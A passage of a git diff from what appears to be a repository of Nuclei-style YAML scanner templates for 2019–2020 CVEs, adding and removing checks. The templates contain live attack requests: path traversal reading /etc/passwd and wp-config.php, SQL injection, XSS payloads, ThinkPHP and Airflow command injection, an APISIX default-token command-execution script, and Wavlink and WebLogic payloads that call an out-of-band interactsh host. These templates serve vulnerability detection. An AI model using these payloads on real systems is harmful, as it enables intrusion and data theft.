words: + - "seriesList" + part: body + - type: word + words: + - "application/json" + part: header + - type: status + status: + - 200 diff --git a/poc/cve/cve-2019-8446-4252.yaml b/poc/cve/cve-2019-8446-4252.yaml deleted file mode 100644 index 99959daaf4..0000000000 --- a/poc/cve/cve-2019-8446-4252.yaml +++ /dev/null @@ -1,39 +0,0 @@ -id: CVE-2019-8446 - -info: - name: Jira Improper Authorization - description: The /rest/issueNav/1/issueTable resource in Jira before version 8.3.2 allows remote attackers to enumerate usernames via an incorrect authorisation check. - author: dhiyaneshDk - severity: medium - tags: cve,cve2019,jira - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.30 - cve-id: CVE-2019-8446 - cwe-id: CWE-863 - reference: - - https://jira.atlassian.com/browse/JRASERVER-69777 - - https://www.talosintelligence.com/vulnerability_reports/TALOS-2019-0839 - -requests: - - raw: - - | - POST /rest/issueNav/1/issueTable HTTP/1.1 - Host: {{Hostname}} - Connection: Close - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 - X-Atlassian-Token: no-check - Accept-Encoding: gzip, deflate - Accept-Language: en-US,en;q=0.9 - - {'jql':'project in projectsLeadByUser("{{randstr}}")'} - - matchers-condition: and - matchers: - - type: word - words: - - "the user does not exist" - part: body - - type: status - status: - - 200 diff --git a/poc/cve/cve-2019-8903.yaml b/poc/cve/cve-2019-8903.yaml deleted file mode 100644 index 5e9901b6e8..0000000000 --- a/poc/cve/cve-2019-8903.yaml +++ /dev/null @@ -1,45 +0,0 @@ -id: CVE-2019-8903 - -info: - name: Totaljs <3.2.3 - Local File Inclusion - author: madrobot - severity: high - description: Total.js Platform before 3.2.3 is vulnerable to local file inclusion. - remediation: | - Upgrade Totaljs to version 3.2.3 or later to fix the LFI vulnerability. - reference: - - https://blog.certimetergroup.com/it/articolo/security/total.js-directory-traversal-cve-2019-8903 - - https://github.com/totaljs/framework/commit/c37cafbf3e379a98db71c1125533d1e8d5b5aef7 - - https://github.com/totaljs/framework/commit/de16238d13848149f5d1dae51f54e397a525932b - - https://nvd.nist.gov/vuln/detail/CVE-2019-8903 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2019-8903 - cwe-id: CWE-22 - epss-score: 0.01071 - epss-percentile: 0.82558 - cpe: cpe:2.3:a:totaljs:total.js:*:*:*:*:*:node.js:*:* - metadata: - max-request: 1 - vendor: totaljs - product: total.js - framework: node.js - tags: cve,cve2019,totaljs,lfi - -http: - - method: GET - path: - - "{{BaseURL}}/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/var/www/html/index.html" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "apache2.conf" - - - type: status - status: - - 200 -# digest: 4a0a00473045022100c7126e080faa3eb1531fe5faa823ef4a6c7f6271e47b3afbe49b8c9650166af00220176776ec7fd2240c424e2621f78179020d06d8a4a1f7aee783b8c8660f26c529:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/cve-2019-8937-4278.yaml b/poc/cve/cve-2019-8937-4278.yaml new file mode 100644 index 0000000000..fc33321181 --- /dev/null +++ b/poc/cve/cve-2019-8937-4278.yaml @@ -0,0 +1,36 @@ +id: CVE-2019-8937 +info: + name: HotelDruid 2.3.0 - XSS + author: LogicalHunter + severity: medium + reference: https://www.exploit-db.com/exploits/46429 + tags: cve,cve2019,xss,hoteldruid + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2019-8937 + cwe-id: CWE-79 + description: "HotelDruid 2.3.0 has XSS affecting the nsextt, cambia1, mese_fine, origine, and anno parameters in creaprezzi.php, tabella3.php, personalizza.php, and visualizza_tabelle.php." +requests: + - method: GET + path: + - '{{BaseURL}}/hoteldruid/visualizza_tabelle.php?anno=2019&id_sessione=&tipo_tabella=prenotazioni&subtotale_selezionate=1&num_cambia_pren=1&cerca_id_passati=1&cambia1=3134671%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + # - '{{BaseURL}}/hoteldruid/visualizza_tabelle.php?nsextt=x">' + + # - '{{BaseURL}}/hoteldruid/visualizza_tabelle.php?anno=2019&id_sessione=&tipo_tabella=periodi&mese_fine=13">' + + # - '{{BaseURL}}/hoteldruid/personalizza.php?anno=2019&id_sessione=&aggiorna_qualcosa=SI&cambianumerotariffe=1&nuovo_numero_tariffe=8&origine=./creaprezzi.php">' + + # - '{{BaseURL}}/hoteldruid/tabella3.php?id_sessione=&mese=01&tutti_mesi=1&anno=2019">' + + # - '{{BaseURL}}/hoteldruid/creaprezzi.php?anno=2019&id_sessione=&ins_rapido_costo=SI&tipocostoagg=perm_min&origine=crearegole.php">' + matchers-condition: and + matchers: + - type: word + words: + - '"' + part: body + - type: word + words: + - "text/html" + part: header diff --git a/poc/cve/cve-2019-9082-4292.yaml b/poc/cve/cve-2019-9082-4292.yaml deleted file mode 100644 index 29138a2552..0000000000 --- a/poc/cve/cve-2019-9082-4292.yaml +++ /dev/null @@ -1,23 +0,0 @@ -id: CVE-2019-9082 -info: - name: ThinkPHP RCE - author: medbsq - severity: high -# https://www.cvebase.com/cve/2019/9082 -requests: - - method: POST - path: - - "{{BaseURL}}/index.php?s=captcha" - headers: - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 - body: _method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=id - matchers-condition: and - matchers: - - type: word - words: - - "uid" - condition: or - part: body - - type: status - status: - - 206 diff --git a/poc/cve/cve-2019-9915(1).yaml b/poc/cve/cve-2019-9915(1).yaml new file mode 100644 index 0000000000..0127935998 --- /dev/null +++ b/poc/cve/cve-2019-9915(1).yaml @@ -0,0 +1,32 @@ +id: CVE-2019-9915 +info: + name: GetSimpleCMS 3.3.13 - Open Redirection + author: 0x_Akoko + severity: medium + description: GetSimpleCMS 3.3.13 has an Open Redirect via the admin/index.php redirect parameter. + reference: + - https://www.invicti.com/web-applications-advisories/ns-18-056-open-redirection-vulnerability-in-getsimplecms + - https://github.com/GetSimpleCMS/GetSimpleCMS/issues/1300 + - https://www.cvedetails.com/cve/CVE-2019-9915 + - https://www.netsparker.com/web-applications-advisories/ns-18-056-open-redirection-vulnerability-in-getsimplecms/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2019-9915 + cwe-id: CWE-601 + metadata: + verified: "true" + tags: cve,cve2019,redirect,getsimple,cms +requests: + - raw: + - | + POST /admin/index.php?redirect=https://interact.sh/ HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + userid={{username}}&pwd={{password}}&submitted=Login + matchers: + - type: regex + part: header + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/' # https://regex101.com/r/ZDYhFh/1 diff --git a/poc/cve/cve-2020-10124(1).yaml b/poc/cve/cve-2020-10124(1).yaml new file mode 100644 index 0000000000..065a434919 --- /dev/null +++ b/poc/cve/cve-2020-10124(1).yaml @@ -0,0 +1,31 @@ +id: CVE-2020-10124 +info: + name: SolarWindsOrion LFI + author: medbsq + severity: medium +#- https://www.cvebase.com/cve/2019/11043 + +requests: + - method: GET + path: + - "{{BaseURL}}/web.config.i18n.ashx?l=j&v=j" + - "{{BaseURL}}/SWNetPerfMon.db.i18n.ashx?l=j&v=j" + headers: + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + matchers-condition: and + matchers: + - type: word + words: + - "SolarWinds.Orion.Core.Common." + - "Connection String" + condition: or + part: body + - type: word + words: + - "text/plain" + - "SolarWindsOrionDatabaseUser" + condition: or + part: header + - type: status + status: + - 200 diff --git a/poc/cve/cve-2020-10220.yaml b/poc/cve/cve-2020-10220.yaml deleted file mode 100644 index 2cc4bdf147..0000000000 --- a/poc/cve/cve-2020-10220.yaml +++ /dev/null @@ -1,50 +0,0 @@ -id: CVE-2020-10220 - -info: - name: rConfig 3.9 - SQL Injection - author: ritikchaddha,theamanrawat - severity: critical - description: | - An issue was discovered in rConfig through 3.9.4. The web interface is prone to a SQL injection via the commands.inc.php searchColumn parameter. - remediation: | - Upgrade to a patched version of rConfig or apply the vendor-supplied patch to mitigate this vulnerability. - reference: - - http://packetstormsecurity.com/files/156950/rConfig-3.9.4-searchField-Remote-Code-Execution.html - - https://nvd.nist.gov/vuln/detail/CVE-2020-10220 - - http://packetstormsecurity.com/files/156688/rConfig-3.9-SQL-Injection.html - - http://packetstormsecurity.com/files/156766/Rconfig-3.x-Chained-Remote-Code-Execution.html - - https://github.com/v1k1ngfr/exploits-rconfig/blob/master/rconfig_CVE-2020-10220.py - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2020-10220 - cwe-id: CWE-89 - epss-score: 0.02204 - epss-percentile: 0.88241 - cpe: cpe:2.3:a:rconfig:rconfig:*:*:*:*:*:*:*:* - metadata: - verified: true - max-request: 1 - vendor: rconfig - product: rconfig - shodan-query: title:"rConfig" - tags: packetstorm,cve,cve2020,rconfig,sqli -variables: - num: "999999999" - -http: - - method: GET - path: - - "{{BaseURL}}/commands.inc.php?searchOption=contains&searchField=vuln&search=search&searchColumn=command%20UNION%20ALL%20SELECT%20(SELECT%20CONCAT(0x223E3C42523E5B50574E5D,md5('{{num}}'),0x5B50574E5D3C42523E)%20limit%200,1),NULL--" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "{{md5(num)}}" - - - type: status - status: - - 200 -# digest: 490a00463044022025c2ad051a88a6b55cea4c3cf31cccd7d3fa8db23d6d1808edb65cee78d0e39d02201173ab667317841df855f850217a903c952f0935235f7c8295c84720aed8a757:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/cve-2020-11455-4397.yaml b/poc/cve/cve-2020-11455-4397.yaml deleted file mode 100644 index 93fb6d59a5..0000000000 --- a/poc/cve/cve-2020-11455-4397.yaml +++ /dev/null @@ -1,32 +0,0 @@ -id: CVE-2020-11455 - -info: - name: LimeSurvey 4.1.11 - Path Traversal - author: daffainfo - severity: medium - description: LimeSurvey before 4.1.12+200324 contains a path traversal vulnerability in application/controllers/admin/LimeSurveyFileManager.php. - reference: - - https://www.exploit-db.com/exploits/48297 - - https://www.cvedetails.com/cve/CVE-2020-11455 - tags: cve,cve2020,lfi - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.30 - cve-id: CVE-2020-11455 - cwe-id: CWE-22 - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php/admin/filemanager/sa/getZipFile?path=/../../../../../../../etc/passwd" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 diff --git a/poc/cve/cve-2020-11530.yaml b/poc/cve/cve-2020-11530.yaml new file mode 100644 index 0000000000..994a6479d0 --- /dev/null +++ b/poc/cve/cve-2020-11530.yaml @@ -0,0 +1,48 @@ +id: CVE-2020-11530 + +info: + name: WordPress Chop Slider 3 - Blind SQL Injection + author: theamanrawat + severity: critical + description: | + WordPress Chop Slider 3 plugin contains a blind SQL injection vulnerability via the id GET parameter supplied to get_script/index.php. The plugin can allow an attacker to execute arbitrary SQL queries in the context of the WP database user, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + remediation: | + Update to the latest version of the WordPress Chop Slider 3 plugin to mitigate the vulnerability. + reference: + - https://wpscan.com/vulnerability/f10cd7d7-6a31-48e5-994c-b100c846001a + - https://github.com/idangerous/plugins/tree/master/Chop%20Slider%203/Chop%20Slider%203%20Wordpress + - https://idangero.us/ + - https://nvd.nist.gov/vuln/detail/CVE-2020-11530 + - http://seclists.org/fulldisclosure/2020/May/26 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2020-11530 + cwe-id: CWE-89 + epss-score: 0.66684 + epss-percentile: 0.97612 + cpe: cpe:2.3:a:idangero:chop_slider:3.0:*:*:*:*:wordpress:*:* + metadata: + verified: true + max-request: 1 + vendor: idangero + product: chop_slider + framework: wordpress + tags: wpscan,seclists,cve,cve2020,sqli,wordpress,wp-plugin,wp,chopslider,unauth + +http: + - raw: + - | + @timeout 10s + GET /wp-content/plugins/chopslider/get_script/index.php?id=1+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))A) HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - 'duration>=6' + - 'status_code == 200' + - 'contains(content_type, "application/javascript")' + - 'contains(body, "$(document).ready(function()")' + condition: and +# digest: 4a0a0047304502205f80ae25c4c4f40c8fc31f0a182a3ec201c3da9a7df2d49628e3684b29ca257a022100a5dd6be779da0df34c5dbac2ae45a8ec11039067c90fb8983f2037bc261c97e2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/cve-2020-11738(1).yaml b/poc/cve/cve-2020-11738(1).yaml new file mode 100644 index 0000000000..280607b065 --- /dev/null +++ b/poc/cve/cve-2020-11738(1).yaml @@ -0,0 +1,45 @@ +id: CVE-2020-11738 +info: + name: WordPress Duplicator plugin Directory Traversal + author: dwisiswant0 + severity: high + description: | + The issue is being actively exploited, and allows attackers + to download arbitrary files, such as the wp-config.php file. + According to the vendor, the vulnerability was only in two + versions v1.3.24 and v1.3.26, the vulnerability wasn't + present in versions 1.3.22 and before. + reference: + - https://www.tenable.com/blog/duplicator-wordpress-plugin-vulnerability-exploited-in-the-wild + - https://snapcreek.com/duplicator/docs/changelog/?lite + - https://www.wordfence.com/blog/2020/02/active-attack-on-recently-patched-duplicator-plugin-vulnerability-affects-over-1-million-sites/ + - http://packetstormsecurity.com/files/160621/WordPress-Duplicator-1.3.26-Directory-Traversal-File-Read.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2020-11738 + cwe-id: CWE-22 + tags: cve,cve2020,wordpress,wp-plugin,lfi,kev +requests: + - method: GET + path: + - "{{BaseURL}}/wp-admin/admin-ajax.php?action=duplicator_download&file=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd" + - "{{BaseURL}}/wp-admin/admin-ajax.php?action=duplicator_download&file=%2F..%2Fwp-config.php" + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: regex + regex: + - "File Transfer" + - "application/octet-stream" + - "attachment; filename=\"(wp-config\\.php|passwd)\"" + condition: and + part: header + - type: regex + regex: + - "root:.*:0:0:" + - "define\\('DB_(NAME|USER|PASSWORD|HOST|CHARSET|COLLATE)'" + condition: or + part: body diff --git a/poc/cve/cve-2020-11978(1).yaml b/poc/cve/cve-2020-11978(1).yaml new file mode 100644 index 0000000000..5c7f6e6c5b --- /dev/null +++ b/poc/cve/cve-2020-11978(1).yaml @@ -0,0 +1,57 @@ +id: CVE-2020-11978 +info: + name: Apache Airflow <= 1.10.10 - 'Example Dag' Remote Code Execution + author: pdteam + severity: high + description: An issue was found in Apache Airflow versions 1.10.10 and below. A remote code/command injection vulnerability was discovered in one of the example DAGs shipped with Airflow which would allow any authenticated user to run arbitrary commands as the user running airflow worker/scheduler (depending on the executor in use). If you already have examples disabled by setting load_examples=False in the config then you are not vulnerable. + reference: + - https://github.com/pberba/CVE-2020-11978 + - https://nvd.nist.gov/vuln/detail/CVE-2020-11978 + - https://twitter.com/wugeej/status/1400336603604668418 + - https://lists.apache.org/thread.html/r7255cf0be3566f23a768e2a04b40fb09e52fcd1872695428ba9afe91%40%3Cusers.airflow.apache.org%3E + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2020-11978 + cwe-id: CWE-77 + metadata: + shodan-query: http.html:"Apache Airflow" || title:"Airflow - DAGs" + verified: "true" + tags: cve,cve2020,apache,airflow,rce,kev +requests: + - raw: + - | + GET /api/experimental/test HTTP/1.1 + Host: {{Hostname}} + Accept: */* + - | + GET /api/experimental/dags/example_trigger_target_dag/paused/false HTTP/1.1 + Host: {{Hostname}} + Accept: */* + - | + POST /api/experimental/dags/example_trigger_target_dag/dag_runs HTTP/1.1 + Host: {{Hostname}} + Accept: */* + Content-Type: application/json + + {"conf": {"message": "\"; touch test #"}} + - | + GET /api/experimental/dags/example_trigger_target_dag/dag_runs/{{exec_date}}/tasks/bash_task HTTP/1.1 + Host: {{Hostname}} + Accept: */* + extractors: + - type: regex + name: exec_date + part: body + group: 1 + internal: true + regex: + - '"execution_date":"([0-9-A-Z:+]+)"' + req-condition: true + matchers-condition: and + matchers: + - type: dsl + dsl: + - 'contains(body_4, "operator":"BashOperator")' + - 'contains(all_headers_4, "application/json")' + condition: and diff --git a/poc/cve/cve-2020-13117-4489.yaml b/poc/cve/cve-2020-13117-4489.yaml new file mode 100644 index 0000000000..bfc0ff9a86 --- /dev/null +++ b/poc/cve/cve-2020-13117-4489.yaml @@ -0,0 +1,29 @@ +id: CVE-2020-13117 +info: + name: Wavlink Multiple AP - Unauthenticated RCE + author: gy741 + severity: critical + description: Several Wavlink products are affected by a vulnerability that may allow remote unauthenticated users to execute arbitrary commands as root on Wavlink devices. The user input is not properly sanitized which allows command injection via the "key" parameter in a login request. It has been tested on Wavlink WN575A4 and WN579X3 devices, but other products may be affected. + reference: + - https://blog.0xlabs.com/2021/02/wavlink-rce-CVE-2020-13117.html + tags: cve,cve2020,wavlink,rce,oast + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-13117 + cwe-id: CWE-77 +requests: + - raw: + - | + POST /cgi-bin/login.cgi HTTP/1.1 + Host: {{Hostname}} + Origin: http://{{Hostname}} + Content-Type: application/x-www-form-urlencoded + Accept-Encoding: gzip, deflate + + newUI=1&page=login&username=admin&langChange=0&ipaddr=192.168.1.66&login_page=login.shtml&homepage=main.shtml&sysinitpage=sysinit.shtml&hostname=wifi.wavlink.com&key=%27%3B%60wget+http%3A%2F%2F{{interactsh-url}}%3B%60%3B%23&password=asd&lang_select=en + matchers: + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http" diff --git a/poc/cve/cve-2020-13121(1).yaml b/poc/cve/cve-2020-13121(1).yaml new file mode 100644 index 0000000000..38db107834 --- /dev/null +++ b/poc/cve/cve-2020-13121(1).yaml @@ -0,0 +1,24 @@ +id: CVE-2020-13121 +info: + name: Submitty 20.04.01 - Open redirect + author: 0x_Akoko + severity: medium + description: Submitty through 20.04.01 has an open redirect via authentication/login?old= during an invalid login attempt. + reference: + - https://github.com/Submitty/Submitty/issues/5265 + - https://www.cvedetails.com/cve/CVE-2020-13121 + tags: cve,cve2020,redirect,submitty + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-13121 + cwe-id: CWE-601 +requests: + - method: GET + path: + - '{{BaseURL}}/authentication/login?old=http%3A%2F%2Flexample.com' + matchers: + - type: regex + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?example\.com(?:\s*?)$' + part: header diff --git a/poc/cve/cve-2020-13945-4535.yaml b/poc/cve/cve-2020-13945-4535.yaml new file mode 100644 index 0000000000..6c740884d6 --- /dev/null +++ b/poc/cve/cve-2020-13945-4535.yaml @@ -0,0 +1,58 @@ +id: CVE-2020-13945 + +info: + name: Apache APISIX's Admin API Default Access Token (RCE) + author: pdteam + severity: medium + description: In Apache APISIX, the user enabled the Admin API and deleted the Admin API access IP restriction rules. Eventually, the default token is allowed to access APISIX management data. This affects versions 1.2, 1.3, 1.4, 1.5. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2020-13945 + - https://github.com/vulhub/vulhub/tree/master/apisix/CVE-2020-13945 + - https://lists.apache.org/thread.html/r792feb29964067a4108f53e8579a1e9bd1c8b5b9bc95618c814faf2f%40%3Cdev.apisix.apache.org%3E + - http://packetstormsecurity.com/files/166228/Apache-APISIX-Remote-Code-Execution.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N + cvss-score: 6.5 + cve-id: CVE-2020-13945 + tags: cve,cve2020,apache,apisix,rce,intrusive + +requests: + - raw: + - | + POST /apisix/admin/routes HTTP/1.1 + Host: {{Hostname}} + X-API-KEY: edd1c9f034335f136f87ad84b625c8f1 + Content-Type: application/json + + { + "uri":"/{{randstr}}", + "script":"local _M = {} \n function _M.access(conf, ctx) \n local os = require('os')\n local args = assert(ngx.req.get_uri_args()) \n local f = assert(io.popen(args.cmd, 'r'))\n local s = assert(f:read('*a'))\n ngx.say(s)\n f:close() \n end \nreturn _M", + "upstream":{ + "type":"roundrobin", + "nodes":{ + "interact.sh:80":1 + } + } + } + + - | + GET /{{randstr}}?cmd=id HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + words: + - '"action":"create"' + - '"script":' + - '"node":' + condition: and + + - type: status + status: + - 201 + + extractors: + - type: regex + regex: + - "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)" diff --git a/poc/cve/cve-2020-14181.yaml b/poc/cve/cve-2020-14181.yaml deleted file mode 100644 index b38cfa0a31..0000000000 --- a/poc/cve/cve-2020-14181.yaml +++ /dev/null @@ -1,45 +0,0 @@ -id: CVE-2020-14181 - -info: - name: Jira Server and Data Center - Information Disclosure - author: bjhulst - severity: medium - description: Jira Server and Data Center is susceptible to information disclosure. An attacker can enumerate users via the /ViewUserHover.jspa endpoint and thus potentially access sensitive information, modify data, and/or execute unauthorized operations. Affected versions are before version 7.13.6, from version 8.0.0 before 8.5.7, and from version 8.6.0 before 8.12.0. - remediation: | - Apply the necessary patches or updates provided by Atlassian to fix the vulnerability. - reference: - - https://jira.atlassian.com/browse/JRASERVER-71560 - - http://packetstormsecurity.com/files/161730/Atlassian-JIRA-8.11.1-User-Enumeration.html - - https://nvd.nist.gov/vuln/detail/CVE-2020-14181 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.3 - cve-id: CVE-2020-14181 - cwe-id: CWE-200 - epss-score: 0.96668 - epss-percentile: 0.99543 - cpe: cpe:2.3:a:atlassian:data_center:*:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: atlassian - product: data_center - shodan-query: http.component:"Atlassian Jira" - tags: cve,cve2020,atlassian,jira,packetstorm - -http: - - method: GET - path: - - '{{BaseURL}}/secure/ViewUserHover.jspa' - - matchers-condition: and - matchers: - - type: word - words: - - 'user-hover-details' - - 'content="JIRA"' - condition: and - - - type: status - status: - - 200 -# digest: 4a0a0047304502204e302056e9c23ccfff1ed6ffb947792cec084d5268e9a8648ea3fb973b1ed700022100d2772006cdf7a1f8fa57862e16164b0a6095027a1567baf94f2d077279a88607:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/cve-2020-14408(1).yaml b/poc/cve/cve-2020-14408(1).yaml deleted file mode 100644 index 36f102aa68..0000000000 --- a/poc/cve/cve-2020-14408(1).yaml +++ /dev/null @@ -1,35 +0,0 @@ -id: CVE-2020-14408 -info: - name: Agentejo Cockpit 0.10.2 - Reflected XSS - author: edoardottt - severity: medium - description: An issue was discovered in Agentejo Cockpit 0.10.2. Insufficient sanitization of the to parameter in the /auth/login route allows for injection of arbitrary JavaScript code into a web page's content, creating a Reflected XSS attack vector. - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2020-14408 - cwe-id: CWE-79 - reference: - - https://github.com/agentejo/cockpit/issues/1310 - - https://nvd.nist.gov/vuln/detail/CVE-2020-14408 - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14408 - metadata: - verified: true - tags: cve,cve2022,cockpit,agentejo,xss,oss -requests: - - method: GET - path: - - "{{BaseURL}}/auth/login?to=/92874%27;alert(document.domain)//280" - matchers-condition: and - matchers: - - type: word - part: body - words: - - "redirectTo = '/92874';alert(document.domain)//280';" - - type: word - part: header - words: - - "text/html" - - type: status - status: - - 200 diff --git a/poc/cve/cve-2020-14882.yaml b/poc/cve/cve-2020-14882.yaml new file mode 100644 index 0000000000..bad4fad2f7 --- /dev/null +++ b/poc/cve/cve-2020-14882.yaml @@ -0,0 +1,46 @@ +id: CVE-2020-14882 + +info: + name: Oracle Weblogic Server - Remote Command Execution + author: dwisiswant0 + severity: critical + description: Oracle WebLogic Server contains an easily exploitable remote command execution vulnerability which allows unauthenticated attackers with network access via HTTP to compromise the server. + remediation: | + Apply the latest security patches provided by Oracle to fix the vulnerability. + reference: + - https://testbnull.medium.com/weblogic-rce-by-only-one-get-request-cve-2020-14882-analysis-6e4b09981dbf + - https://www.oracle.com/security-alerts/cpuoct2020.html + - https://twitter.com/jas502n/status/1321416053050667009 + - https://youtu.be/JFVDOIL0YtA + - https://github.com/jas502n/CVE-2020-14882#eg + - https://nvd.nist.gov/vuln/detail/CVE-2020-14882 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2020-14882 + epss-score: 0.97402 + epss-percentile: 0.99907 + cpe: cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: oracle + product: weblogic_server + tags: cve,cve2020,oracle,rce,weblogic,oast,kev + +http: + - method: GET + path: + - "{{BaseURL}}/console/images/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext('http://{{interactsh-url}}')" + + matchers-condition: and + matchers: + - type: word + part: header + words: + - "ADMINCONSOLESESSION" + + - type: word + part: interactsh_protocol + words: + - "http" +# digest: 4a0a0047304502204cf7f23d1f286d27b2baa39b807a5ebc4d3ac2cc58f7e9615bdf52b0e7874fd6022100f1e9c6951b81ca34db0919b3bd819fa078174adf742c5542d46045942d82583c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/cve-2020-19282-4706.yaml b/poc/cve/cve-2020-19282-4706.yaml deleted file mode 100644 index b89e24088b..0000000000 --- a/poc/cve/cve-2020-19282-4706.yaml +++ /dev/null @@ -1,33 +0,0 @@ -id: CVE-2020-19282 -info: - name: Jeesns 1.4.2 XSS - author: pikpikcu - severity: medium - description: Reflected cross-site scripting (XSS) vulnerability in Jeesns 1.4.2 allows attackers to execute arbitrary web scripts or HTML via a crafted payload in the system error message's text field. - reference: - - https://github.com/zchuanzhao/jeesns/issues/11 - - https://nvd.nist.gov/vuln/detail/CVE-2020-19282 - - https://www.seebug.org/vuldb/ssvid-97940 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2020-19282 - cwe-id: CWE-79 - tags: cve,cve2020,jeesns,xss -requests: - - method: GET - path: - - "{{BaseURL}}/error?msg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - matchers-condition: and - matchers: - - type: word - words: - - '' - part: body - - type: status - status: - - 200 - - type: word - part: header - words: - - text/html diff --git a/poc/cve/cve-2020-19360-4714.yaml b/poc/cve/cve-2020-19360-4714.yaml new file mode 100644 index 0000000000..260f3ae9f8 --- /dev/null +++ b/poc/cve/cve-2020-19360-4714.yaml @@ -0,0 +1,30 @@ +id: CVE-2020-19360 +info: + name: FHEM 6.0 - Local File Inclusion + author: 0x_Akoko + severity: high + description: FHEM version 6.0 suffers from a local file inclusion vulnerability. + reference: + - https://github.com/EmreOvunc/FHEM-6.0-Local-File-Inclusion-LFI-Vulnerability/blob/master/README.md + - https://www.cvedetails.com/cve/CVE-2020-19360/ + - https://github.com/EmreOvunc/FHEM-6.0-Local-File-Inclusion-LFI-Vulnerability + - https://emreovunc.com/blog/en/FHEM-v6.0-LFI-Vulnerability-01.png + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2020-19360 + tags: fhem,lfi,cve,cve2020 +requests: + - method: GET + path: + - "{{BaseURL}}/fhem/FileLog_logWrapper?dev=Logfile&file=%2fetc%2fpasswd&type=text" + matchers-condition: and + matchers: + - type: regex + regex: + - "root:[x*]:0:0" + - type: status + status: + - 200 + +# Enhanced by mp on 2022/05/04 diff --git a/poc/cve/cve-2020-2036-4730.yaml b/poc/cve/cve-2020-2036-4730.yaml deleted file mode 100644 index fc2519a3aa..0000000000 --- a/poc/cve/cve-2020-2036-4730.yaml +++ /dev/null @@ -1,34 +0,0 @@ -id: CVE-2020-2036 